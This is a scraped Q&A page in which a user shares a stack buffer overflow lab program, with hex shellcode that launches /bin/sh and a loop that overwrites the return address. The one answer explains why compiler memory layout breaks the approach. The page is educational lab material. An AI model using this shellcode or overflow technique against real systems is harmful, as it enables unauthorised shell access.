stackoom
  简体   繁体   中英

how to write an buffer overflow?

 原文  2016-11-26 09:39:17       c/ buffer-overflow

Question

I've been doing buffer overflow test, mostly I read from Aleph One's Smashing The Stack For Fun And Profit. 

#include<string.h>
#include<stdio.h>

char shellcode[]="\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0
\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x8\x8d\x53\x0c\xcd\x80\xe8
\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4e\x58\x58\x58\x58
\x59\x59\x59\x59";

char large_str[104]; /*length equals to buffer + i + ptr + return_address*/

int main(){
    char buffer[56];/*same length as shellcode*/
    int i;
    long *ptr=(long*)large_str;

    memset(&large_str,0,104); /*initialize large_str*/
    for(i=0;i<24;i++)
            *(ptr+i)=(int)buffer; /*overwrite return address*/

    for(i=0;i<strlen(shellcode);i++)
            large_str[i]=shellcode[i];



    strcpy(buffer,large_str); /*doing overflow*/
    return 0;
}

doing 

$gcc -o overflow -fno-stack-protector overflow.c
$./overflow
segmentation fault (core dumped)

Before doing this, I've turned random address off already. Also, I've tested my shellcode in program: 

int main(int argc, char **argv)
{
    int (*func)();
    func=(int(*)())code;
    (int)(*func)();
}

it works. so I don't know what's wrong with my buffer overflow code, is there anyone who's got experience with buffer overflow lab? I debugged with gdb, it seems I didn't over write return address properly.

1 answers

solution1
 2  2016-11-26 09:53:14

Your code makes assumptions on where stuff like buffer will be in memory.

And what was valid for a set of compilers in 1996, from when your article is, is simply not true anymore, 20 years later in 2016.

This has nothing to do with stack protection, or address layout randomization. It's simply that there's no reason the compiler should put the return address pointer right after your large_str – the compiler isn't stupid and sees that buffer is allocated in main , anyways, so it will just pick any location that seems convenient in memory to store buffer . And there's absolutely no reason to assume that this is

  1. on the stack to begin with (why should it? The compiler knows its lifetime, so it could as well be anywhere), see stack and heap are not what you think .
  2. The memory layout will be return pointer – large_str – anything else. There's nothing that defines that. And there shouldn't be. It's a choice to be made by the compiler, and frankly, it probably won't make the same choice as you.

暂无
暂无

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

Related Question How to implement a buffer overflow Arbitrary write vulnerability without buffer overflow How to prevent Buffer overflow / array overflow? How to prevent memcpy buffer overflow? How detect a buffer overflow with splint How to 'hack' with buffer overflow attack How to avoid buffer overflow in c How to use buffer overflow exploit How can I write a string, then a null byte, then more data using scanf() in the perspective of a buffer overflow? How to write a buffer-overflow exploit in GCC,windows XP,x86?
Related Tags
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM